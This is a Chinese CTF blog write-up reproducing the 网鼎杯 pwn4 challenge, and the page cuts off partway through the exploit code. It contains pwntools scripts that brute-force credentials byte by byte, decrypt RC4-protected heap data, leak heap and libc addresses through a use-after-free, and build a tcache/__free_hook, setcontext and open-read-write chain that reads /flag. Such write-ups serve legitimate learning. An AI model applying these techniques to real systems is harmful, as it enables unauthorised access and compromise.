<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="pwn, ctf, pwnable, ctfwriteup, writeup, essays, 题解">
    <meta name="description" content="Marce1&#39;s blog">
    <meta name="author" content="Marce1">
    
    <title>
        
            网鼎杯pwn4复现 |
        
        Marce1&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/Marce1_2.svg">
    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/font/css/regular.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/font/css/solid.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/font/css/brands.min.css">
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"marce1bin.github.io","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"Marce1's Blog","author":"Marce1","avatar":"/images/Marce1_2.svg","logo":"/images/Marce1_2.svg","favicon":"/images/Marce1_2.svg"},"menu":{"home":"/                        || fa-solid fa-house","archives":"/archives           || fa-solid fa-book","tags":"/tags                 || fa-solid fa-tags","categories":"/categories     || fa-solid fa-layer-group","about":"/about              || fa-solid fa-user-graduate"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"取乎其上，得乎其中；取乎其中，得乎其下；取乎其下，则无所得矣。","hitokoto":false},"social_contact":{"enable":false,"links":{"github":null,"weixin":"img | /images/weixin.PNG","qq":"img | /images/qq.PNG","weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":true,"percent":false,"hide_header":true},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"updated"},"post":{"author_badge":{"enable":false,"level_badge":false,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":true,"share":true,"reward":{"enable":false,"img_link":null,"text":null,"icon":null}},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.36"},"waline":{"server_url":null,"reaction":false,"version":"3.2.1"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":true,"provider":"cdnjs"},"pjax":{"enable":true},"footer":{"since":2020,"word_count":true,"site_deploy":{"enable":false,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.2.3"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/Marce1_2.svg">
                </a>
            
            <a class="site-name border-box" href="/">
               Marce1&#39;s Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-house"></i>
                                
                                首页
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-book"></i>
                                
                                归档
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/tags">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-tags"></i>
                                
                                标签
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/categories">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-layer-group"></i>
                                
                                分类
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/about">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-user-graduate"></i>
                                
                                关于
                                
                            </a>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-house"></i>
                                </span>
                            
                            首页
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-book"></i>
                                </span>
                            
                            归档
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/tags">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-tags"></i>
                                </span>
                            
                            标签
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/categories">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-layer-group"></i>
                                </span>
                            
                            分类
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/about">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-user-graduate"></i>
                                </span>
                            
                            关于
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        网鼎杯pwn4复现
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/Marce1_2.svg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">Marce1</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2024-10-31 00:01:37</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Fri Nov 01 2024 00:32:46 GMT+0800">2024-11-01 00:32:46</span>
            </span>
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/pwn/">pwn</a></li>
                        
                    
                            <li class="category-item">&nbsp;<i class="icon fas fa-angle-right"></i>&nbsp;<a href="/categories/pwn/heap/">heap</a></li>
                        
                    
                            <li class="category-item">&nbsp;<i class="icon fas fa-angle-right"></i>&nbsp;<a href="/categories/pwn/heap/setcontext/">setcontext</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/pwn/">pwn</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/blasting/">blasting</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/heap/">heap</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/setcontext/">setcontext</a></li>
                        
                    
                </ul>
            </span>
        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>2.8k 字</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>13 分钟</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h1 id="网鼎杯pwn4"><a href="#网鼎杯pwn4" class="headerlink" title="网鼎杯pwn4"></a>网鼎杯pwn4</h1><blockquote>
<p><a href="wangding_pwn4.zip">下载附件</a></p>
</blockquote>
<p>​	中午发的题，一看数据库心想没学过去看那道webpwn，没学过，rust，没学过。事已至此，先吃饭吧。</p>
<p>​	吃完饭后还是看了一眼附件，花了20分钟分析觉得能打，密码爆破+加密+堆orw，想到了之前打过的silverwolf，就是打tcache_struct+setcontext来绕过堆orw。最后还是卡在加密，找gpt要了两次脚本都没过，现在来看实在是gpt差距。最后争不动去上数电课了，整场比赛就出了一道300分的pwn签到，最战犯的一集</p>
<h2 id="爆破账号密码"><a href="#爆破账号密码" class="headerlink" title="爆破账号密码"></a>爆破账号密码</h2><p>​	<img   src="/2024/10/31/%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4%E5%A4%8D%E7%8E%B0/image-20241031003530540.png"  alt="image-20241031003530540"></p>
<p>​	看到用户名检测后续想到爆破，第一步和绕过strncmp的原理相同，他只会比较你输入的字符串长度范围内的两个字符串有没有差异，所以我们可以逐字节爆破。但是之后他还是会检查两个字符串长度，所以我们需要爆破完整的账号。</p>
<p>​	一般账号密码只会使用键盘上有的字符，可以预先准备一个爆破字典，我的方法是直接爆破ascii 33-126范围的字符。可以直接用man命令查看ascii码对应的字符</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">main ascii</span><br></pre></td></tr></table></figure>

<p>爆破脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>, <span class="number">127</span>):</span><br><span class="line">        success(<span class="string">&quot;try----&gt;&quot;</span>+<span class="built_in">chr</span>(i))</span><br><span class="line">        p.sendafter(<span class="string">&quot;Input your username:&quot;</span>,username+<span class="built_in">chr</span>(i)+<span class="string">&#x27;\0&#x27;</span>+<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">        p.recvline()</span><br><span class="line">        recv = p.recvline()</span><br><span class="line">        <span class="keyword">if</span> <span class="string">b&quot;Invalid username!&quot;</span> <span class="keyword">in</span> recv <span class="keyword">and</span> <span class="string">b&quot;Invalid username length!&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> recv:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            success(<span class="string">&quot;find----&gt;&quot;</span>+<span class="built_in">chr</span>(i))</span><br><span class="line">            username += <span class="built_in">chr</span>(i)</span><br><span class="line">            success(<span class="string">&quot;username----&gt;&quot;</span>+username)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">b&quot;Username correct!&quot;</span> <span class="keyword">in</span> recv:</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>对于密码的爆破也同理</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">p.sendlineafter(&quot;Input your username:&quot;,username)</span><br><span class="line">for i in range(10):</span><br><span class="line">    for j in range(33, 127):</span><br><span class="line">        p.sendlineafter(b&#x27;Input your password:\n&#x27;, passwd+chr(j))</span><br><span class="line">        recv = p.recvline()</span><br><span class="line">        if b&#x27;Invalid password!&#x27; in recv:</span><br><span class="line">            p.sendlineafter(&quot;Input your username:&quot;,username)</span><br><span class="line">            continue</span><br><span class="line">        elif b&#x27;Invalid password length!&#x27; in recv:</span><br><span class="line">            success(&quot;find----&gt;&quot;+chr(j))</span><br><span class="line">            passwd += chr(j)</span><br><span class="line">            success(&quot;passwd----&gt;&quot;+passwd)</span><br><span class="line">            p.sendlineafter(&quot;Input your username:&quot;,username)</span><br><span class="line">            break</span><br><span class="line">    if b&quot;Password correct!&quot; in recv:</span><br><span class="line">        break&#x27;&#x27;&#x27;</span><br></pre></td></tr></table></figure>

<p>这个程序如果账号密码不正确会直接退出，还会贴心的回到输入账号密码的入口，所以我们不必每次都p.remote()和p.close()。但是每次爆破密码不成功都要重新输入一次账户。</p>
<p>最后爆破出来用户名是”4dmin”，密码是”985da4f8cb37zkj”。</p>
<p>在本地调试的时候记得自己添加一个password和username文件测试爆破脚本是否有效。</p>
<h2 id="存储内容加密"><a href="#存储内容加密" class="headerlink" title="存储内容加密"></a>存储内容加密</h2><p><img   src="/2024/10/31/%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4%E5%A4%8D%E7%8E%B0/image-20241031123819151.png"  alt="image-20241031123819151"></p>
<p>​	之后就是经典的增删改查，在释放堆块时有uaf漏洞。但是他在每次存入和修改数据时都会先把数据输入，再对数据长度的内容加密，每次查看数据时再把数据取出来解密，显示数据内容再加密放回去</p>
<p>​	<img   src="/2024/10/31/%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4%E5%A4%8D%E7%8E%B0/image-20241031124633565.png"  alt="image-20241031124633565"></p>
<p><img   src="/2024/10/31/%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4%E5%A4%8D%E7%8E%B0/image-20241031124655745.png"  alt="image-20241031124655745"></p>
<p><img   src="/2024/10/31/%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4%E5%A4%8D%E7%8E%B0/image-20241031124715479.png"  alt="image-20241031124715479"></p>
<p>​	加密的过程看了一遍之后不能说是完全看懂，至少也是一窍不通。不仅是泄露释放堆块后的main_arena偏移还是堆地址，还是填入伪造地址都要绕过加密。</p>
<p>​	但是从最后的异或和解密来看可能加密和解密过程都是相同的，一开始我想能否通过重复填入加密后的内容得到加密前的内容，不用写解密脚本了？程序遵守填入&#x2F;更改就加密，取回解密展示再加密放回，所以除了写解密脚本没有别的办法泄露内容。</p>
<p>​	只好把代码扔给了ai生成如下解密脚本（没有ai的世界是多么寸步难行……或许是我太捞了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">sub_1152</span>(<span class="params">state_array, output, length</span>):</span><br><span class="line">    v5 = <span class="number">0</span></span><br><span class="line">    v6 = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(length):</span><br><span class="line">        v5 = (v5 + <span class="number">1</span>) % <span class="number">256</span></span><br><span class="line">        v6 = (v6 + state_array[v5]) % <span class="number">256</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment"># Swap in state array</span></span><br><span class="line">        state_array[v5], state_array[v6] = state_array[v6], state_array[v5]</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># Encrypt the data</span></span><br><span class="line">        output[i] ^= state_array[(state_array[v5] + state_array[v6]) % <span class="number">256</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">encrypt</span>(<span class="params">plaintext</span>):</span><br><span class="line">    key = <span class="string">b&#x27;s4cur1ty_p4ssw0rd&#x27;</span></span><br><span class="line">    state_array = <span class="built_in">bytearray</span>(<span class="number">256</span>)</span><br><span class="line">    <span class="comment"># Initialize the state array using sub_F98</span></span><br><span class="line">    sub_F98(state_array)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># Prepare output buffer</span></span><br><span class="line">    output_data = <span class="built_in">bytearray</span>(plaintext)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># Encrypt using sub_1152</span></span><br><span class="line">    sub_1152(state_array, output_data, <span class="built_in">len</span>(plaintext))</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">bytes</span>(output_data)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">decrypt</span>(<span class="params">encrypted_data</span>):</span><br><span class="line">    key = <span class="string">b&#x27;s4cur1ty_p4ssw0rd&#x27;</span></span><br><span class="line">    state_array = <span class="built_in">bytearray</span>(<span class="number">256</span>)</span><br><span class="line">    <span class="comment"># Initialize the state array using sub_F98</span></span><br><span class="line">    sub_F98(state_array)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># Prepare output buffer</span></span><br><span class="line">    decrypted_data = <span class="built_in">bytearray</span>(encrypted_data)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># Decrypt using sub_1152</span></span><br><span class="line">    sub_1152(state_array, decrypted_data, <span class="built_in">len</span>(encrypted_data))</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">bytes</span>(decrypted_data)</span><br></pre></td></tr></table></figure>

<p>但是我的解密脚本似乎有问题，当输入比较长时，就会发生这种情况：</p>
<p><img   src="/2024/10/31/%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4%E5%A4%8D%E7%8E%B0/image-20241031170337068.png"  alt="image-20241031170337068"></p>
<p>后半段完全变成乱码了:-( 比赛的时候急得我上蹿下跳，完全忘了队里的re手</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/Mr_Fmnwon/article/details/143355594" >https://blog.csdn.net/Mr_Fmnwon/article/details/143355594<i class="fas fa-external-link-alt"></i></a></p>
<p>事后复现嫖走了这位师傅的解密函数: -)  </p>
<p><img   src="/2024/10/31/%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4%E5%A4%8D%E7%8E%B0/image-20241031171154440.png"  alt="image-20241031171154440"></p>
<p>好耶。</p>
<p>原来事rc4加密。这rc4加密真rc4啊。</p>
<h2 id="泄露堆地址与libc地址"><a href="#泄露堆地址与libc地址" class="headerlink" title="泄露堆地址与libc地址"></a>泄露堆地址与libc地址</h2><p>​	glibc版本2.27，引入了tcache还没有其他什么检测，甚至可以通过直接覆盖fd的方式请出任意已知位置的堆块，几乎是板子题。但程序沙箱禁用了exeve和exeveat</p>
<p><img   src="/2024/10/31/%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4%E5%A4%8D%E7%8E%B0/image-20241031130324051.png"  alt="image-20241031130324051"></p>
<p>对于这个版本的堆orw，我想到了之前做过的ciscn2021 silverwolf，同样也是打tcache利用setcontext，但是那个题申请堆块大小有限，所以必须通过控制tcache_struct拼接两个堆块来填入足够长度的orw链。比赛的时候我局限了，照着silverwolf的脚本就是一顿复制粘贴，但实际上这个题对于堆块大小没有限制，完全可以不用打tcache_struct。</p>
<p>在通过账号密码之后用pwndbg看一眼堆会发现乱得一，这是因为沙箱的原因</p>
<p><img   src="/2024/10/31/%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4%E5%A4%8D%E7%8E%B0/image-20241031155345109.png"  alt="image-20241031155345109"></p>
<p>我们首先通过tcache泄露堆地址，通过uaf泄露地址时内存中的确是原地址，但程序执行时先会取出解密再展示，所以我们还是要把取出来的数据走一遍解密</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0</span>, <span class="number">0x70</span>, <span class="string">b&#x27;aaaa&#x27;</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;[0,&#x27;</span>)</span><br><span class="line">encry1 = p.recv(<span class="number">8</span>)</span><br><span class="line">success(<span class="string">&quot;encry1----&gt;&quot;</span>+<span class="built_in">hex</span>(u64(encry1)))</span><br><span class="line">heap = rc4((encry1))</span><br><span class="line">success(<span class="string">&quot;heap----&gt;&quot;</span>+<span class="built_in">hex</span>(u64(heap)))</span><br><span class="line">heap_base = u64(heap)+<span class="number">0x55b4ebaab000</span>-<span class="number">0x55b4ebaabc70</span></span><br><span class="line">success(<span class="string">&quot;heap_base----&gt;&quot;</span>+<span class="built_in">hex</span>(heap_base))</span><br></pre></td></tr></table></figure>

<p>然后我们需要填满tcache，再释放一个相同大小的堆块放入unsortedbin泄露libc基址。这个堆块需要大于0x70，不然会放入fastbin，同时为了防止沙箱残留的堆块造成影响，所以我选择了0x150大小的堆块。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>):</span><br><span class="line">    add(i, <span class="number">0x240</span>, <span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">    delete(i)</span><br><span class="line">show(<span class="number">7</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;[7,&#x27;</span>)</span><br><span class="line">encry2 = p.recv(<span class="number">8</span>)</span><br><span class="line">main_arena = u64(rc4(encry2)) -<span class="number">0x96</span></span><br><span class="line">success(<span class="string">&quot;main_arena----&gt;&quot;</span>+<span class="built_in">hex</span>(main_arena))</span><br><span class="line">libc_base = main_arena+ <span class="number">0x7f14b1604000</span> - <span class="number">0x7f14b19efc0a</span></span><br><span class="line">success(<span class="string">&quot;libc_base----&gt;&quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br></pre></td></tr></table></figure>

<h2 id="setcontext-orw"><a href="#setcontext-orw" class="headerlink" title="setcontext &amp; orw"></a>setcontext &amp; orw</h2><p><img   src="/2024/10/31/%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4%E5%A4%8D%E7%8E%B0/image-20241031160953889.png"  alt="image-20241031160953889"></p>
<p>如图是附件给的动态链接库里setcontext函数的样子，在setcontext+53的位置开始可以通过rdi的偏移设置各个寄存器，而<u>在free一个堆块时会将rdi指向该堆块的位置</u>。先把预备free的堆块上设置setcontext的frame，其中rsp设置为free_hook+8，然后把（setcontext+53）+（orw）写到free_hook上，这样就可以直接返回到orw</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;&#x27;frame = SigreturnFrame()</span></span><br><span class="line"><span class="string">frame.rdi = free_hook+0x100</span></span><br><span class="line"><span class="string">frame.rsi = 0</span></span><br><span class="line"><span class="string">frame.rdx = 0</span></span><br><span class="line"><span class="string">frame.rsp = free_hook+0x8</span></span><br><span class="line"><span class="string">frame.rip = libc_base+libc.sym[&#x27;open&#x27;]</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">frame = <span class="string">b&#x27;&#x27;</span></span><br><span class="line">frame = frame.ljust(<span class="number">0x68</span>, <span class="string">b&#x27;\x00&#x27;</span>)+p64(free_hook+<span class="number">0x108</span>)+p64(<span class="number">0</span>) <span class="comment">#rdi rsi</span></span><br><span class="line">frame = frame.ljust(<span class="number">0x88</span>, <span class="string">b&#x27;\x00&#x27;</span>)+p64(<span class="number">0</span>) <span class="comment">#rdx</span></span><br><span class="line">frame = frame.ljust(<span class="number">0xa0</span>, <span class="string">b&#x27;\x00&#x27;</span>)+p64(free_hook+<span class="number">8</span>)+p64(libc_base+libc.sym[<span class="string">&#x27;open&#x27;</span>])<span class="comment">#rsp rcx</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x160</span>, <span class="built_in">bytes</span>(frame))</span><br><span class="line"></span><br><span class="line">rdi = libc_base + <span class="number">0x2164f</span></span><br><span class="line">rsi = libc_base + <span class="number">0x23a6a</span></span><br><span class="line">rdx = libc_base + <span class="number">0x1b96</span></span><br><span class="line">setcontext = libc_base+libc.sym[<span class="string">&#x27;setcontext&#x27;</span>]</span><br><span class="line">payload_orw = p64(rdi)+p64(<span class="number">3</span>)+p64(rsi)+p64(heap_base+<span class="number">0x1100</span>)+p64(rdx)+p64(<span class="number">0x100</span>)+p64(libc_base+libc.sym[<span class="string">&#x27;read&#x27;</span>])</span><br><span class="line">payload_orw += p64(rdi)+p64(<span class="number">1</span>)+p64(libc_base+libc.sym[<span class="string">&#x27;write&#x27;</span>])</span><br><span class="line">payload_orw = payload_orw.ljust(<span class="number">0x100</span>, <span class="string">b&#x27;\x00&#x27;</span>)+<span class="string">b&#x27;/flag\x00&#x27;</span></span><br><span class="line"></span><br><span class="line">edit(<span class="number">6</span>, rc4(p64(free_hook)))</span><br><span class="line">add(<span class="number">7</span>, <span class="number">0x150</span>, <span 